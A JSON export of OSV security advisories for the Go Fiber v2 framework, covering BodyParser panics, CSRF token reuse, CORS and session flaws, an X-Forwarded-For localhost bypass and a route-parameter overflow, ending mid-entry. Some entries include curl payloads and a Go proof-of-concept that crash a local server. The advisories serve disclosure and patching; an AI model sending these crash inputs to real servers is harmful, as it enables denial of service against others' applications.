{"ecosystem":"go","package":"github.com/gofiber/fiber/v2","version":null,"bugs":[{"id":5234,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.9","bug_id":"osv:GHSA-qx2q-88mx-vhg7","title":"Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder","description":"### Description\n\nWhen using Fiber's `Ctx.BodyParser` to parse form data containing a large numeric key that represents a slice index (e.g., `test.18446744073704`), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder.\n\nThe root cause is that the decoder attempts to allocate a slice of length `idx + 1` without validating whether the index is within a safe or reasonable range. If `idx` is excessively large, this leads to an integer overflow or memory exhaustion, causing a panic or crash.\n\n\n### Steps to Reproduce\n\nCreate a POST request handler that accepts `x-www-form-urlencoded` data\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct{} `form:\"test\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(&formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n\t\treturn nil\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\nRun the server and send a POST request with a large numeric key in form data, such as:\n\n```bash\ncurl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \\\n  -H 'Content-Type: application/x-www-form-urlencoded'\n```\n\n\n### Relevant Code Snippet\n\nWithin the decoder's [decode method](https://github.com/gofiber/fiber/blob/v2.52.8/internal/schema/decoder.go#L249):\n\n```go\nidx := parts[0].index\nif v.IsNil() || v.Len() < idx+1 {\n    value := reflect.MakeSlice(t, idx+1, idx+1)  // <-- 
Panic/crash occurs here when idx is huge\n    if v.Len() < idx+1 {\n        reflect.Copy(value, v)\n    }\n    v.Set(value)\n}\n```\n\nThe `idx` is not validated before use, leading to unsafe slice allocation for extremely large values.\n\n---\n\n### Impact\n\n- Application panic or crash on malicious or malformed input.\n- Potential denial of service (DoS) via memory exhaustion or server crash.\n- Lack of defensive checks in the parsing code causes instability.","severity":"high","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-qx2q-88mx-vhg7","labels":["CVE-2025-54801","GO-2025-3845"],"created_at":"2026-04-26 03:01:59.043201+00:00","updated_at":"2026-04-26 03:01:59.043201+00:00"},{"id":5233,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GHSA-mv73-f69x-444p","title":"Go Fiber CSRF Token Validation Vulnerability","description":"A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the application, which allows an attacker to obtain tokens and forge malicious requests on behalf of a user. This can lead to unauthorized actions being taken on the user's behalf, potentially compromising the security and integrity of the application.\n\n## Vulnerability Details\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The following issues were identified:\n\n1. **Lack of Token Association**: The CSRF token was validated against tokens in storage but was not tied to the original requestor that generated it, allowing for token reuse.\n\n## Remediation\n\nTo remediate this vulnerability, it is recommended to take the following actions:\n\n1. **Update the Application**: Upgrade the application to a fixed version with a patch for the vulnerability.\n\n2. 
**Implement Proper CSRF Protection**: Review the updated documentation and ensure your application's CSRF protection mechanisms follow best practices.\n\n4. **Choose CSRF Protection Method**: Select the appropriate CSRF protection method based on your application's requirements, either the Double Submit Cookie method or the Synchronizer Token Pattern using sessions.\n\n5. **Security Testing**: Conduct a thorough security assessment, including penetration testing, to identify and address any other security vulnerabilities.\n\n## Defence-in-depth\n\nUsers should take additional security measures like captchas or Two-Factor Authentication (2FA) and set Session cookies with SameSite=Lax or SameSite=Strict, and the Secure and HttpOnly attributes.","severity":"high","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mv73-f69x-444p","labels":["CVE-2023-45141","GO-2023-2116"],"created_at":"2026-04-26 03:01:59.040594+00:00","updated_at":"2026-04-26 03:01:59.040594+00:00"},{"id":5231,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":"2.52.6","fixed_version":"2.52.7","bug_id":"osv:GHSA-hg3g-gphw-5hhm","title":"Fiber panics when fiber.Ctx.BodyParser parses invalid range index","description":"### Summary\nWhen using the `fiber.Ctx.BodyParser` to parse into a struct with range values, a panic occurs when trying to parse a negative range index\n\n### Details\n`fiber.Ctx.BodyParser` can map flat data to nested slices using `key[idx]value` syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data. 
\n\nSince this data is user-provided, this could lead to denial of service for anyone relying on this `fiber.Ctx.BodyParser` functionality.\n\n### Reproducing\nTake a simple GoFiberV2 server which returns a JSON encoded version of the FormData\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct {\n\t\tValue string `form:\"value\"`\n\t} `form:\"nested-content\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(&formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n\t\tc.Set(\"Content-Type\", \"application/json\")\n\t\ts, _ := json.Marshal(formData)\n\t\treturn c.SendString(string(s))\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\n**Correct Behaviour**\nSend a valid request such as:\n```bash\ncurl --location 'localhost:3000' \\\n--form 'nested-content[0].value=\"Foo\"' \\\n--form 'nested-content[1].value=\"Bar\"'\n```\nYou receive valid JSON\n```json\n{\"NestedContent\":[{\"Value\":\"Foo\"},{\"Value\":\"Bar\"}]}\n```\n\n**Crashing behaviour**\nSend an invalid request such as:\n```bash\ncurl --location 'localhost:3000' \\\n--form 'nested-content[-1].value=\"Foo\"'\n```\nThe server panics and crashes\n```\npanic: reflect: slice index out of range\n\ngoroutine 8 [running]:\nreflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)\n        /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167\ngithub.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})\n[...]\n```\n\n### Impact\nAnyone using `fiber.Ctx.BodyParser` can/will have their servers crashed when an invalid payload is 
sent","severity":"high","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm","labels":["CVE-2025-48075","GO-2025-3706"],"created_at":"2026-04-26 03:01:59.032532+00:00","updated_at":"2026-04-26 03:01:59.032532+00:00"},{"id":5243,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.12","bug_id":"osv:GO-2026-4543","title":"Fiber has a Denial of Service Vulnerability via Route Parameter Overflow in github.com/gofiber/fiber","description":"Fiber has a Denial of Service Vulnerability via Route Parameter Overflow in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mrq8-rjmw-wpq3","labels":["CVE-2026-25882","GHSA-mrq8-rjmw-wpq3"],"created_at":"2026-04-26 03:01:59.066857+00:00","updated_at":"2026-04-26 03:01:59.066857+00:00"},{"id":5242,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.11","bug_id":"osv:GO-2026-4471","title":"Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() on crypto/rand failure in github.com/gofiber/fiber","description":"Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() — predictable / zero‑UUID on crypto/rand failure in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-68rr-p4fp-j59v","labels":["CVE-2025-66630","GHSA-68rr-p4fp-j59v"],"created_at":"2026-04-26 03:01:59.064206+00:00","updated_at":"2026-04-26 03:01:59.064206+00:00"},{"id":5241,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.9","bug_id":"osv:GO-2025-3845","title":"Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder in github.com/gofiber/fiber","description":"Fiber Crashes in BodyParser Due to Unvalidated 
Large Slice Index in Decoder in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-qx2q-88mx-vhg7","labels":["CVE-2025-54801","GHSA-qx2q-88mx-vhg7"],"created_at":"2026-04-26 03:01:59.061579+00:00","updated_at":"2026-04-26 03:01:59.061579+00:00"},{"id":5240,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":"2.52.6","fixed_version":"2.52.7","bug_id":"osv:GO-2025-3706","title":"Fiber panics when fiber.Ctx.BodyParser parses invalid range index in github.com/gofiber/fiber","description":"Fiber panics when fiber.Ctx.BodyParser parses invalid range index in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm","labels":["CVE-2025-48075","GHSA-hg3g-gphw-5hhm"],"created_at":"2026-04-26 03:01:59.058963+00:00","updated_at":"2026-04-26 03:01:59.058963+00:00"},{"id":5239,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.5","bug_id":"osv:GO-2024-2959","title":"Session Middleware Token Injection Vulnerability in github.com/gofiber/fiber","description":"Session Middleware Token Injection Vulnerability in github.com/gofiber/fiber","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-98j2-3j3p-fw2v","labels":["CVE-2024-38513","GHSA-98j2-3j3p-fw2v"],"created_at":"2026-04-26 03:01:59.056312+00:00","updated_at":"2026-04-26 03:01:59.056312+00:00"},{"id":5238,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.1","bug_id":"osv:GO-2024-2574","title":"Insecure CORS Configuration allowing wildcard origin with credentials in github.com/gofiber/fiber/v2","description":"The CORS middleware allows for insecure configurations that could potentially expose the application to 
multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (\"*\") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg","labels":["CVE-2024-25124","GHSA-fmg4-x8pw-hjhg"],"created_at":"2026-04-26 03:01:59.053703+00:00","updated_at":"2026-04-26 03:01:59.053703+00:00"},{"id":5237,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GO-2023-2116","title":"CSRF token validation vulnerability in github.com/gofiber/fiber/v2","description":"A cross-site request forgery vulnerability can allow an attacker to obtain tokens and forge malicious requests on behalf of a user. This can lead to unauthorized actions being taken on the user's behalf, potentially compromising the security and integrity of the application.\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The CSRF token is validated against tokens in storage but is not tied to the original requestor that generated it, allowing for token reuse.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mv73-f69x-444p","labels":["CVE-2023-45141","GHSA-mv73-f69x-444p"],"created_at":"2026-04-26 03:01:59.051048+00:00","updated_at":"2026-04-26 03:01:59.051048+00:00"},{"id":5236,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GO-2023-2115","title":"CSRF token reuse vulnerability in github.com/gofiber/fiber/v2","description":"A cross-site request forgery vulnerability in this package can allow an attacker to inject arbitrary values and forge malicious requests on behalf of a user. 
The attacker may inject arbitrary values without any authentication, or perform various malicious actions on behalf of an authenticated user, potentially compromising the security and integrity of the application.\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. For 'safe' methods, the token is extracted from the cookie and saved to storage without further validation or sanitization. In addition, the CSRF token is validated against tokens in storage but not associated with a session, nor by using a Double Submit Cookie Method, allowing for token reuse.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-94w9-97p3-p368","labels":["CVE-2023-45128","GHSA-94w9-97p3-p368"],"created_at":"2026-04-26 03:01:59.048392+00:00","updated_at":"2026-04-26 03:01:59.048392+00:00"},{"id":5235,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.49.2-0.20230906112033-b8c9ede6efa2","bug_id":"osv:GO-2023-2052","title":"IsFromLocal local address check can be circumvented in github.com/gofiber/fiber/v2","description":"The Ctx.IsFromLocal function can incorrectly report a request as being sent from localhost when the request contains an X-Forwarded-For header containing a localhost IP address.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-3q5p-3558-364f","labels":["CVE-2023-41338","GHSA-3q5p-3558-364f"],"created_at":"2026-04-26 03:01:59.045857+00:00","updated_at":"2026-04-26 03:01:59.045857+00:00"},{"id":5232,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.12","bug_id":"osv:GHSA-mrq8-rjmw-wpq3","title":"Fiber has a Denial of Service Vulnerability via Route Parameter Overflow","description":"A denial of service vulnerability exists in Fiber v2 and v3 that allows remote 
attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.\n\n## Affected Versions\n\n- **Fiber v3.0.0-rc.3** and earlier v3 releases\n- **Fiber v2.52.10** and potentially all v2 releases (confirmed exploitable)\n- Both versions share the same vulnerable routing implementation\n\n## Vulnerability Details\n\n### Root Cause\n\nBoth Fiber v2 and v3 define a fixed-size parameter array in `ctx.go`:\n\n```go\nconst maxParams = 30\n\ntype DefaultCtx struct {\n    values [maxParams]string  // Fixed 30-element array\n    // ...\n}\n```\n\nThe `router.go` `register()` function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in `path.go` performs an unbounded write:\n\n- **v3**: `path.go:514`\n- **v2**: `path.go:516`\n\n```go\n// path.go:514 - NO BOUNDS CHECKING\nparams[paramsIterator] = path[:i]\n```\n\nWhen `paramsIterator >= 30`, this triggers:\n```\npanic: runtime error: index out of range [30] with length 30\n```\n\n### Attack Scenario\n\n1. Application registers route with >30 parameters (e.g., via code or dynamic routing):\n   ```go\n   app.Get(\"/api/:p1/:p2/:p3/.../p35\", handler)\n   ```\n\n2. Attacker sends matching HTTP request:\n   ```bash\n   curl http://target/api/v1/v2/v3/.../v35\n   ```\n\n3. 
Server crashes during request processing with runtime panic\n\n## Proof of Concept\n\n### For Fiber v3\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v3\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"✓ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9999\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9999/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\n🔴 Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:514 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"✗ Request failed: %v\\n\", err)\n\t\tfmt.Println(\"💥 Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output:**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\n✓ Registration succeeded (NO PANIC)\n\n🔴 Sending exploit request...\nExpected: panic at path.go:514 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v3.(*routeParser).getMatch(...)\n\t/path/to/fiber/path.go:514\ngithub.com/gofiber/fiber/v3.(*Route).match(...)\n\t/path/to/fiber/router.go:89\ngithub.com/gofiber/fiber/v3.(*App).next(...)\n\t/path/to/fiber/router.go:142\n```\n\n### For Fiber v2\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v2\"\n)\n\nfunc main() 
{\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c *fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"✓ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9998\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9998/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\n🔴 Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:516 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"✗ Request failed: %v\\n\", err)\n\t\tfmt.Println(\"💥 Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output (v2):**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\n✓ Registration succeeded (NO PANIC)\n\n🔴 Sending exploit request...\nExpected: panic at path.go:516 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v2.(*routeParser).getMatch(...)\n\t/path/to/fiber/v2@v2.52.10/path.go:512\ngithub.com/gofiber/fiber/v2.(*Route).match(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:84\ngithub.com/gofiber/fiber/v2.(*App).next(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:127\n```\n\n## Impact\n\n### Exploitation Requirements\n- No authentication required\n- Single HTTP request triggers crash\n- Trivially scriptable for sustained DoS\n- Works against any route with >30 parameters\n\n### Real-World Impact\n- **Public APIs**: Remote DoS attacks on vulnerable endpoints\n- **Microservices**: Cascade failures if 
vulnerable service is critical\n- **Auto-scaling**: Repeated crashes prevent proper recovery\n- **Monitoring**: Log flooding and alert fatigue\n\n### Likelihood\n**HIGH** - Exploitation requires only:\n- Knowledge of route structure (often public in APIs)\n- Standard HTTP client (curl, browser, etc.)\n- Single malformed request\n\n## Workarounds\n\nUntil patched, users should:\n\n1. **Audit Routes**: Ensure all routes have ≤30 parameters\n   ```bash\n   # Search for potential issues\n   grep -r \"/:.*/:.*/:.*\" . | grep -v node_modules\n   ```\n\n2. **Disable Dynamic Routing**: If programmatically registering routes, validate parameter count:\n   ```go\n   paramCount := strings.Count(route, \":\")\n   if paramCount > 30 {\n       log.Fatal(\"Route exceeds maxParams\")\n   }\n   ```\n\n3. **Rate Limiting**: Deploy aggressive rate limiting to mitigate DoS impact\n\n4. **Monitoring**: Alert on panic patterns in application logs\n\n## Timeline\n\n- **2024-12-24**: Vulnerability discovered in v3 during PR #3962 review\n- **2024-12-25**: Proof of concept confirmed exploitability in v3\n- **2024-12-25**: Vulnerability confirmed to also exist in v2 (same root cause)\n- **2024-12-25**: Security advisory created\n\n## References\n\n- **v3 Related PR**: https://github.com/gofiber/fiber/pull/3962 (UpdateParam feature with defensive checks, doesn't fix root cause)\n- **Vulnerable Code Locations**:\n  - v3: [path.go:514](https://github.com/gofiber/fiber/blob/main/path.go#L514)\n  - v2: [path.go:516](https://github.com/gofiber/fiber/blob/v2/path.go#L516)\n\n## Credit\n\n**Discovered by:** @sixcolors (Fiber maintainer) and @TheAspectDev","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-mrq8-rjmw-wpq3","labels":["CVE-2026-25882","GO-2026-4543"],"created_at":"2026-04-26 03:01:59.035252+00:00","updated_at":"2026-04-26 
03:01:59.035252+00:00"},{"id":5227,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":"2.0.0","fixed_version":"2.43.0","bug_id":"osv:GHSA-927h-x4qj-r242","title":"github.com/gofiber/fiber/v2 vulnerable to Origin Validation Error","description":"The Olivier Poitrey Go CORS handler through 1.3.0 actively converts a wildcard CORS policy into reflecting an arbitrary Origin header value, which is incompatible with the CORS security design, and could lead to CORS misconfiguration security problems.","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-20744","labels":["CVE-2018-20744","GO-2023-1792"],"created_at":"2026-04-26 03:01:59.021917+00:00","updated_at":"2026-04-26 03:01:59.021917+00:00"},{"id":5225,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.49.2","bug_id":"osv:GHSA-3q5p-3558-364f","title":"Fiber unauthorized access vulnerability in `ctx.IsFromLocal()`","description":"### Impact\nThis vulnerability can be categorized as a security misconfiguration. It impacts users of our project who rely on the [ctx.IsFromLocal()](https://docs.gofiber.io/api/ctx#isfromlocal) method to restrict access to localhost requests. 
If exploited, it could allow unauthorized access to resources intended only for localhost.\n\nIn its implementation it uses c.IPs():\n\n```go\n// IPs returns a string slice of IP addresses specified in the X-Forwarded-For request header.\n// When IP validation is enabled, only valid IPs are returned.\nfunc (c *Ctx) IPs() []string {\n    return c.extractIPsFromHeader(HeaderXForwardedFor)\n}\n```\n\nThereby, setting `X-Forwarded-For: 127.0.0.1` in a request from a foreign host will result in true for [ctx.IsFromLocal()](https://docs.gofiber.io/api/ctx#isfromlocal).\n\n### Patches\nThis issue has been patched in `v2.49.2` with commit [b8c9ede6efa231116c4bd8bb9d5e03eac1cb76dc](https://github.com/gofiber/fiber/commit/b8c9ede6efa231116c4bd8bb9d5e03eac1cb76dc)\n\n### Workarounds\nCurrently, there are no known workarounds to remediate this vulnerability without upgrading to the patched version. We strongly advise users to apply the patch as soon as it is released.\n\n### References\nFor further information and context regarding this security issue, please refer to the following resources:\n\n- [Mozilla Developer Network - X-Forwarded-For](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For)\n\n","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-3q5p-3558-364f","labels":["CVE-2023-41338","GO-2023-2052"],"created_at":"2026-04-26 03:01:59.007997+00:00","updated_at":"2026-04-26 03:01:59.007997+00:00"},{"id":5230,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.1","bug_id":"osv:GHSA-fmg4-x8pw-hjhg","title":"Fiber has Insecure CORS Configuration, Allowing Wildcard Origin with Credentials","description":"The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. 
Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (\"*\") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.\n\n## Impact\nThe impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references.\n\n## Proof of Concept\nThe code in cors.go allows setting a wildcard in the AllowOrigins while having AllowCredentials set to true, which could lead to various vulnerabilities.\n\n## Potential Solution\nHere is a potential solution to ensure the CORS configuration is secure:\n\n```go\nfunc New(config ...Config) fiber.Handler {\n    // Apply the default configuration before validating it\n    cfg := configDefault(config...)\n\n    // Refuse to start with a wildcard origin combined with credentials\n    if cfg.AllowCredentials && cfg.AllowOrigins == \"*\" {\n        panic(\"[CORS] Insecure setup, 'AllowCredentials' is set to true, and 'AllowOrigins' is set to a wildcard.\")\n    }\n    // Return new handler goes below\n}\n```\n\nThe middleware will not allow insecure configurations when using `AllowCredentials` and `AllowOrigins`.\n\n## Workarounds\nIn the meantime, users are advised to manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. 
The browser fetch api, browsers and utilities that enforce CORS policies are not affected by this.\n\n## References\n[MDN Web Docs on CORS Errors](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials)\n[CodeQL on CORS Misconfiguration](https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials/)\n[PortSwigger on Exploiting CORS Misconfigurations](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n[WhatWG CORS protocol and credentials ](https://fetch.spec.whatwg.org/#cors-protocol-and-credentials)","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg","labels":["CVE-2024-25124","GO-2024-2574"],"created_at":"2026-04-26 03:01:59.029875+00:00","updated_at":"2026-04-26 03:01:59.029875+00:00"},{"id":5229,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.5","bug_id":"osv:GHSA-98j2-3j3p-fw2v","title":"Session Middleware Token Injection Vulnerability","description":"A security vulnerability has been identified in the Fiber session middleware where a user can supply their own session_id value, leading to the creation of a session with that key.\n\n## Impact\nThe identified vulnerability is a session middleware issue in GoFiber versions 2 and above. This vulnerability allows users to supply their own session_id value, resulting in the creation of a session with that key. If a website relies on the mere presence of a session for security purposes, this can lead to significant security risks, including unauthorized access and session fixation attacks. All users utilizing GoFiber's session middleware in the affected versions are impacted.\n\n## Patches\nThe issue has been addressed in the latest patch. 
Users are strongly encouraged to upgrade to version 2.52.5 or higher to mitigate this vulnerability.\n\n## Workarounds\nUsers who are unable to upgrade immediately can apply the following workarounds to reduce the risk:\n\n1. **Validate Session IDs**: Implement additional validation to ensure session IDs are not supplied by the user and are securely generated by the server.\n2. **Session Management**: Regularly rotate session IDs and enforce strict session expiration policies.\n\n## References\nFor more information on session best practices:\n- [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)\n\nUsers are encouraged to review these references and take immediate action to secure their applications.","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-98j2-3j3p-fw2v","labels":["CVE-2024-38513","GO-2024-2959"],"created_at":"2026-04-26 03:01:59.027223+00:00","updated_at":"2026-04-26 03:01:59.027223+00:00"},{"id":5228,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.50.0","bug_id":"osv:GHSA-94w9-97p3-p368","title":"CSRF Token Reuse Vulnerability","description":"A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the application, which allows an attacker to inject arbitrary values and forge malicious requests on behalf of a user. This vulnerability can allow an attacker to inject arbitrary values without any authentication, or perform various malicious actions on behalf of an authenticated user, potentially compromising the security and integrity of the application.\n\n## Vulnerability Details\n\nThe vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The following issues were identified:\n\n1. 
**Token Injection**: For 'safe' methods, the token was extracted from the cookie and saved to storage without further validation or sanitization.\n\n2. **Lack of Token Association**: The CSRF token was validated against tokens in storage but not associated with a session, nor by using a Double Submit Cookie Method, allowing for token reuse.\n\n### Specific Go Packages Affected\ngithub.com/gofiber/fiber/v2/middleware/csrf\n\n## Remediation\n\nTo remediate this vulnerability, it is recommended to take the following actions:\n\n1. **Update the Application**: Upgrade the application to a fixed version with a patch for the vulnerability.\n\n2. **Implement Proper CSRF Protection**: Review the updated documentation and ensure your application's CSRF protection mechanisms follow best practices.\n\n4. **Choose CSRF Protection Method**: Select the appropriate CSRF protection method based on your application's requirements, either the Double Submit Cookie method or the Synchronizer Token Pattern using sessions.\n\n5. 
